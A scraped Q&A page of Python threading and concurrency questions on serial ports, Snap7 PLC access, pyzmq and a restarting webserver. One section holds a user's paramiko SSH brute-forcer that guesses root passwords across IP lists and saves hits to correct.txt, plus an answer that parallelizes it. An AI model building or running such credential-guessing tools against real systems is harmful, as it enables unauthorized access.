Python Threading More then one agrument given - python

I am trying to start threads and I keep getting and error message saying that I am trying to send more than one argument. It seems like the Thread object does not take the variable port as one argument but rather each character in the string as one separate argument. How is this working ? It is my first time multithreading in python.
Error message:
Exception in thread /dev/ttyUSB0:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
TypeError: report() takes exactly 1 argument (12 given)
Code:
def report(port):
print("\n")
print(st() +"Connecting to" + port[0])
device = serial.Serial(port=port[0], baudrate=9600, timeout=0.2)
print (st() + "Connection sucessfull...")
print (st() + "Initializing router on "+ port[0])
if initialize_router(device) == 0:
return 0
print (st() + "Initialization sucessfull")
print (st() + "Starting to inject IP basic config")
if inject_config(device) == 0:
print(errror("injecing the confing",port[0]))
return 0
print(st()+ "Finished injecting default IP setting on router connected to " + port[0])
return 1
if __name__ == '__main__':
ports = list_ports.comports()
list_port = list(ports)
port_counter = -1
for port in list_port:
if "USB" in port[0]:
port_counter = port_counter + 1
port = "/dev/ttyUSB" + str(port_counter)
thread = Thread(target=report, args=(port), name=port)
thread.start()
print port
print ("\n")
continue

thread = Thread(target=report, args=(port), name=port)
I'm guessing you wanted to pass a single element tuple to args here. But those parentheses around port have no effect by themselves. Try:
thread = Thread(target=report, args=(port,), name=port)

Related

Python pySerial - Problem using subclasses

I'm working on a project in Python that uses two or more serial ports to manage some devices from my RPi. When ports are open in the same file and I send commands to different instances of serial.Serial object everything works fine. This is an example:
import serial
device1_port = "/dev/ttyUSB0"
device2_port = "/dev/ttyUSB1"
# Command sent to device 1. No problem
d1 = serial.Serial(device1_port, timeout = 0.5)
d1.write(b'GET MUTE\n')
output1 = d1.readline()
print("Device 1 output: " + str(output1))
# Command sent to device 2. No problem
d2 = serial.Serial(device2_port, timeout = 1)
d2.write(b'00vP\r')
output2 = d2.readline()
print("Device 2 output: " + str(output2))
Output:
Device 1 output: b'DATA MUTE OFF\r\n'
Device 2 output: b'00vP0\r'
The problem comes when I try to separate one device from another using subclasses of serial.Serial. The reason is I want to deal with them like objects with their own methods (each device needs a lot of different commands, status queries...).
class device1(serial.Serial):
def __init__(self, port, timeout):
super().__init__(port, timeout)
serial.Serial(port, timeout)
def command1(self):
self.write(b'SET MUTE OFF\n')
self.write(b'GET MUTE\n')
output = self.readline()
print("Device 1 output: " + str(output))
class device2(serial.Serial):
def __init__(self, port, timeout):
super().__init__(port, timeout)
serial.Serial(port, timeout)
def command2(self):
self.write(b'00vP\r')
output = self.readline()
print("Device 2 output: " + str(output))
device1_port = "/dev/ttyUSB0"
device2_port = "/dev/ttyUSB1"
d1 = device1(device1_port, timeout=0.5)
d2 = device2(device2_port, timeout=1)
d1.command1()
d2.command2()
When I run this code the output is:
Device 1 output: b'DATA MUTE OFF\r\n'
_
and it keeps waiting forever for the second device. I'm forced to Ctrl + C and I get this:
^CTraceback (most recent call last):
File "./ct3.py", line 35, in <module>
d2.command2()
File "./ct3.py", line 23, in command2
output = self.readline()
File "/usr/lib/python3/dist-packages/serial/serialposix.py", line 483, in read
ready, _, _ = select.select([self.fd, self.pipe_abort_read_r], [], [], timeout.time_left())
KeyboardInterrupt
It's seems like there is some kind of conflict between the two subclasses but, obviously I have no idea what I'm doing wrong.
Can someone help me please?
You shouldn't be calling serial.Serial(port, timeout) from your __init__,
as super().__init__(...) is already doing this. See these answers. You don't even need an __init__ if you are not going to change what the base class does.
Also, there is a difference in your two versions with respect to the use of positional and keyword arguments. serial.Serial()'s first 2 positional arguments are port, baudrate, so you need to explicitly use the keyword argument timeout=:
def __init__(self, port, timeout):
super().__init__(port, timeout=timeout)

Job Pending Exception During Snap7-Python Data Read / Write to PLC

During reading and writing data to Siemens s7 1200 PLC with Python- Snap7, I get an Exception as follows:
Exception in thread Thread-2:
Traceback (most recent call last):
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\Lib\threading.py", line 917, in _bootstrap_inner
self.run()
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\Lib\threading.py", line 865, in run
self._target(*self._args, **self._kwargs)
File "C:\Companies\Personal\deneme\deneme_iterasyonlar\plcman.py", line 59, in read_data
torque=plc.read_area(areas['DB'],110,80,24)
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\lib\site-packages\snap7\client.py", line 256, in read_area
check_error(result, context="client")
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\lib\site-packages\snap7\common.py", line 65, in check_error
raise Snap7Exception(error)
snap7.snap7exceptions.Snap7Exception: b'CLI : Job pending'
I don't experience this problem during single channel db_read/db_write but occurs when an additional read or write channel is active.
I have tried area_read & area_write and db_read and db_write options but receive similar errors.
Main Code:
plc=plcman.PLC_Controller('192.168.30.100',0,1)
plc.connect()
time.sleep(1)
plc.start_thread2()
time.sleep(1)
plc.start_thread()
PLC Data-Read Write Code
class PLC_Controller:
plc=c.Client()
def __init__(self, address, rack, slot):
self.address = address
self.rack = rack
self.slot = slot
def connect(self):
count = 0
if plc.get_connected() == False:
print("Try " + str(count) + " - Connecting to PLC: " +
self.address + ", Rack: " + str(self.rack) + ", Slot: " + str(self.slot))
try:
plc.connect(self.address, self.rack, self.slot) #('IP-address', rack, slot)
except Exception as e:
print(e)
if plc.get_connected() == True:
return plc.get_connected() == True
def get_word(self,_bytearray, byte_index):
data = _bytearray[byte_index:byte_index + 2]
data=data[::-1]
dword = struct.unpack('H', struct.pack('2B', *data))[0]
return dword
def read_data(self):
torque=plc.read_area(areas['DB'],110,80,24)
data1=self.get_word(torque,0)
time.sleep(0.8)
self.read_data()
def start_thread(self):
thread = threading.Thread(target=self.read_data, args=())
thread.daemon = True
thread.start()
def set_word(self,_bytearray, byte_index, word):
word=int(word)
_bytes = struct.pack('H', word)
_bytes=_bytes[::-1]
for i, b in enumerate(_bytes):
time.sleep(1)
_bytearray[byte_index + i] = b
res=plc.write_area(areas['DB'],110,24,_bytearray)
def start_thread2(self):
thread = threading.Thread(target=self.stoprun, args=())
thread.daemon = True
thread.start()
def stoprun(self):
Lamp=4
torque=plc.read_area(areas['DB'],110,80,24)
val1=self.set_word(torque, 0, 8)
self.stoprun()
Thanks in advance.
read & write should have different instances of PLC connection. Modified connection will be:
plc=plcman.PLC_Controller('192.168.30.100',0,1) # for reading use plc.read_area()
plc.connect()
plc2=plcman.PLC_Controller('192.168.30.100',0,1)
plc2.connect() #for writing use plc2.write_area()
upto 3 instances are allowed. During read&write "job pending" will not be received

Python pyzmq: program stucks

It is a simple PUB/SUB program using pyzmq and multiprocessing.
The server is PUB. It sends a slice of an ahah list to client SUB every time.
The client SUB first .recv_string() one message, then it changes the socket .recv_string()-processing mode to a NOBLOCK one, inside the .Poller() loop.
import logging
import zmq
from multiprocessing import Process
def server_init(port_pub):
ahah = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
index = 0
num = 2
context = zmq.Context()
socket_pub = context.socket(zmq.PUB)
socket_pub.bind("tcp://127.0.0.1:%s" % port_pub)
# socket_rep = context.socket(zmq.REP)
# socket_rep.bind("tcp://*:%s" % port_rep)
socket_pub.send_string(' '.join(str(v) for v in ahah[index : index + num - 1]))
index = index + num
poller_pub = zmq.Poller()
poller_pub.register(socket_pub, zmq.POLLOUT)
should_continue = True
while should_continue:
socks = dict(poller_pub.poll())
if socket_pub in socks and socks[socket_pub] == zmq.POLLOUT and index <= 9:
socket_pub.send_string(' '.join(str(v) for v in ahah[index : index + num - 1]), zmq.NOBLOCK)
index = index + num
else:
should_continue = False
poller_pub.unregister(socket_pub)
def client(port_sub):
context = zmq.Context()
socket_sub = context.socket(zmq.SUB)
socket_sub.connect("tcp://127.0.0.1:%s" % port_sub)
tmp = socket_sub.recv_string()
process_message(tmp)
poller_sub = zmq.Poller()
poller_sub.register(socket_sub, zmq.POLLIN)
should_continue = True
while should_continue:
socks = dict(poller_sub.poll())
if socket_sub in socks and socks[socket_sub] == zmq.POLLIN:
tmp = socket_sub.recv_string(zmq.NOBLOCK)
process_message(tmp)
else:
should_continue = False
poller_pub.unregister(socket_sub)
def process_message(msg):
print("Processing ... %s" % msg)
if __name__ == '__main__':
logging.info('starting')
Process(target=server_init, args=(5566,)).start()
Process(target=client, args=(5566,)).start()
When I launch the program, it just stucks there and outputs nothing like:
$ python test.py
Until after a Ctrl-C is pressed:
$ python test2.py
^CProcess Process-2:
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/multiprocessing/popen_fork.py", line 29, in poll
pid, sts = os.waitpid(self.pid, flag)
KeyboardInterrupt
Traceback (most recent call last):
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/multiprocessing/process.py", line 254, in _bootstrap
self.run()
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/multiprocessing/process.py", line 93, in run
self._target(*self._args, **self._kwargs)
File "test2.py", line 38, in client
tmp = socket_sub.recv_string()
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/site-packages/zmq/sugar/socket.py", line 402, in recv_string
b = self.recv(flags=flags)
File "zmq/backend/cython/socket.pyx", line 674, in zmq.backend.cython.socket.Socket.recv (zmq/backend/cython/socket.c:6971)
File "zmq/backend/cython/socket.pyx", line 708, in zmq.backend.cython.socket.Socket.recv (zmq/backend/cython/socket.c:6763)
File "zmq/backend/cython/socket.pyx", line 145, in zmq.backend.cython.socket._recv_copy (zmq/backend/cython/socket.c:1931)
File "zmq/backend/cython/checkrc.pxd", line 12, in zmq.backend.cython.checkrc._check_rc (zmq/backend/cython/socket.c:7222)
KeyboardInterrupt
I think the client should at least .recv() one msg.
But why not?
Why?
Besides other reasons, your client side has simply forgotten to subscribe to anything meaningful before calling the first .recv_string(), thus it hangs forever in a blocking-mode receive, while there is nothing that can meet the SUB-side TOPIC-filter on received messages and thus no such one will ever pass to .recv_string()-processing.
Just add socket_sub.setsockopt( "" ) as the ZeroMQ default is to rather subscribe to nothing ( as no one can indeed guess any magic of what shall pass the TOPIC-filter in one's actual context, so as a paradox, nothing seems to be the best choice available in this sense ).
Next also be careful on timing ( .bind() / .connect() ) sensitivity.
For more details, do not hesistate to download and read the fabulous Pieter HINTJENS' book "Code Connected, Volume 1".

Multithreading my simple SSH Brute forcer

I've coded a simple SSH Bruteforcer , and I am trying to make it multi-threaded as it is running very slowly at the moment. As you can see in the last few lines I have given it an attempt, but don't understand threading fully. I have read a few examples but I don't quite understand it fully, so I felt adding into my program will make me understand it better.
Code:
try:
import paramiko
except ImportError:
print("Paramiko module not installed, exiting.")
from multiprocessing.dummy import Pool, Process, JoinableQueue as Queue
import os
from datetime import datetime
startTime = datetime.now()
UserName2 = 'root'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0
IPLines = 0
PasswordLines = 0
with open('pass.txt') as txt1:
for line in txt1:
if line.strip():
PasswordLines += 1
with open('ip.txt') as txt2:
for line2 in txt2:
if line2.strip():
IPLines += 1
current_attempts = 0
max_attempts = PasswordLines * IPLines
def print_results(found):
while True:
ip, password = found.get()
print("Found: %r %r" % (ip, password))
found.task_done()
def init(found_):
global found
found = found_
def generate_passwords():
#return (line.strip() for line in open(pass_file))
global ip
global pwd
global txt4
txt3 = open(pass_file, "r")
txt4 = open(ip_file, "r")
for line3 in txt3.readlines():
pwd = line3.strip()
for line4 in txt4.readlines():
ip = line4.strip()
def check(ip_password):
global current_attempts
ip, password = ip_password
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip, port, username=UserName2, password=pwd)
except paramiko.AuthenticationException, e:
print e
print '[-] %s:%s fail!' % (UserName2, pwd)
current_attempts += 1
except Exception, e:
print e
else:
print '[!] %s:%s is CORRECT for IP %s!' % (UserName2, pwd, ip)
username, password, ipaddress = UserName2, pwd, ip
found.put((username,password,ipaddress))
seconds_taken = datetime.now() - startTime
print 'brute forcing took %s seconds' % seconds_taken
ssh.close()
print 'Found login in %s attempts' % current_attempts
if os.path.isfile("correct.txt"):
c = open("correct.txt", "a")
c.write('\n' + ip + ':' + UserName2 + ':' + pwd)
elif os.path.isfile("correct.txt"):
c = open('correct.txt', "w")
c.write(ip + ':' + UserName2 + ':' + pwd)
def main():
found = Queue()
t = Process(target=check, args=[found])
t.daemon = True # do not survive the parent
t.start()
pool = Pool(processes=20, initializer=init, initargs=[found])
args = ((ip, password) for password in generate_passwords() for ip in txt4)
for _ in pool.imap_unordered(check, args):
pass
pool.close() # no more tasks
pool.join() # wait for all tasks in the pool to complete
found.join() # wait until all results are printed
if __name__ == "__main__":
main()
Errors:
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 65, in check
ip, password = ip_password
TypeError: iteration over non-sequence
Traceback (most recent call last):
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 107, in <module>
main()
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 99, in main
args = ((ip, password) for password in generate_passwords() for ip in txt4)
TypeError: 'NoneType' object is not iterable
The problem is embarrassingly parallel. You can run concurrently the ssh connection attempts both for different ips and passwords:
#!/usr/bin/env python
# remove .dummy to use processes instead of threads
from multiprocessing.dummy import Pool
def check(params):
ip, username, password = params
# emulate ssh login attempt #XXX put your ssh connect code here
import random
successful = random.random() < .0001
return successful, params
def main():
creds = {}
ips = ["168.1.2.%d" % i for i in range(256)] #XXX dummy ip list, use yours
usernames = ["nobody", "root"] #XXX dummy user list, use yours
def generate_args():
for ip in ips:
for username in usernames:
for password in generate_passwords():
if (ip, username) in creds:
break
yield ip, username, password
pool = Pool(processes=20)
for success, params in pool.imap_unordered(check, generate_args()):
if not success:
continue
print("Found: %r" % (params,))
ip, username, password = params
creds[ip, username] = password
pool.close() # no more tasks
pool.join() # wait for all tasks in the pool to complete
if __name__=="__main__":
main()
where ips is a list if all ips you want to try and generate_passwords() is a generator that yields one password at a time, here's an example:
def generate_passwords(pass_file):
return (line.strip() for line in open(pass_file))
About errors
ValueError: too many values to unpack
your code has found.put((username,password,ipaddress)) (a tuple with 3 values) but print_results() function expects ip, password = found.get() (2 values). The error "too many values to unpack" is because 3 is larger than 2.
'NoneType' object is not iterable
attempt() function returns nothing (None) but you put it in the place for generate_passwords() that must generate passwords (see the example implementation above).

Python 3.3 Webserver restarting problems

I have made a simple webserver in python, and had some problems with it before as described here: Python (3.3) Webserver script with an interesting error
In that question, the answer was to use a While True: loop so that any crashes or errors would be resolved instantly, because it would just start itself again.
I've used this for a while, and still want to make the server restart itself every few minutes, but on Linux for some reason it won't work for me. On windows the code below works fine, but on linux it keeps saying
Handler class up here
...
...
class Server:
def __init__(self):
self.server_class = HTTPServer
self.server_adress = ('MY IP GOES HERE, or localhost', 8080)
global httpd
httpd = self.server_class(self.server_adress, Handler)
self.main()
def main(self):
if count > 1:
global SERVER_UP_SINCE
HOUR_CHECK = int(((count - 1) * RESTART_INTERVAL) / 60)
SERVER_UPTIME = str(HOUR_CHECK) + " MINUTES"
if HOUR_CHECK > 60:
minutes = int(HOUR_CHECK % 60)
hours = int(HOUR_CHECK // 60)
SERVER_UPTIME = ("%s HOURS, %s MINUTES" % (str(hours), str(minutes)))
SERVING_ON_ADDR = self.server_adress
SERVER_UP_SINCE = str(SERVER_UP_SINCE)
SERVER_RESTART_NUMBER = count - 1
print("""
SERVER INFO
-------------------------------------
SERVER_UPTIME: %s
SERVER_UP_SINCE: %s
TOTAL_FILES_SERVED: %d
SERVING_ON_ADDR: %s
SERVER_RESTART_NUMBER: %s
\n\nSERVER HAS RESTARTED
""" % (SERVER_UPTIME, SERVER_UP_SINCE, TOTAL_FILES, SERVING_ON_ADDR, SERVER_RESTART_NUMBER))
else:
print("SERVER_BOOT=1\nSERVER_ONLINE=TRUE\nRESTART_LOOP=TRUE\nSERVING_ON_ADDR:%s" % str(self.server_adress))
while True:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("Shutting down...")
break
httpd.shutdown()
httpd.socket.close()
raise(SystemExit)
return
def server_restart():
"""If you want the restart timer to be longer, replace the number after the RESTART_INTERVAL variable"""
global RESTART_INTERVAL
RESTART_INTERVAL = 10
threading.Timer(RESTART_INTERVAL, server_restart).start()
global count
count = count + 1
instance = Server()
if __name__ == "__main__":
global SERVER_UP_SINCE
SERVER_UP_SINCE = strftime("%d-%m-%Y %H:%M:%S", gmtime())
server_restart()
Basically, I make a thread to restart it every 10 seconds (For testing purposes) and start the server. After ten seconds it will say
File "/home/username/Desktop/Webserver/server.py", line 199, in __init__
httpd = self.server_class(self.server_adress, Handler)
File "/usr/lib/python3.3/socketserver.py", line 430, in __init__
self.server_bind()
File "/usr/lib/python3.3/http/server.py", line 135, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.3/socketserver.py", line 441, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
As you can see in the except KeyboardInterruption line, I tried everything to make the server stop, and the program stop, but it will NOT stop. But the thing I really want to know is how to make this server able to restart, without giving some wonky errors.

Categories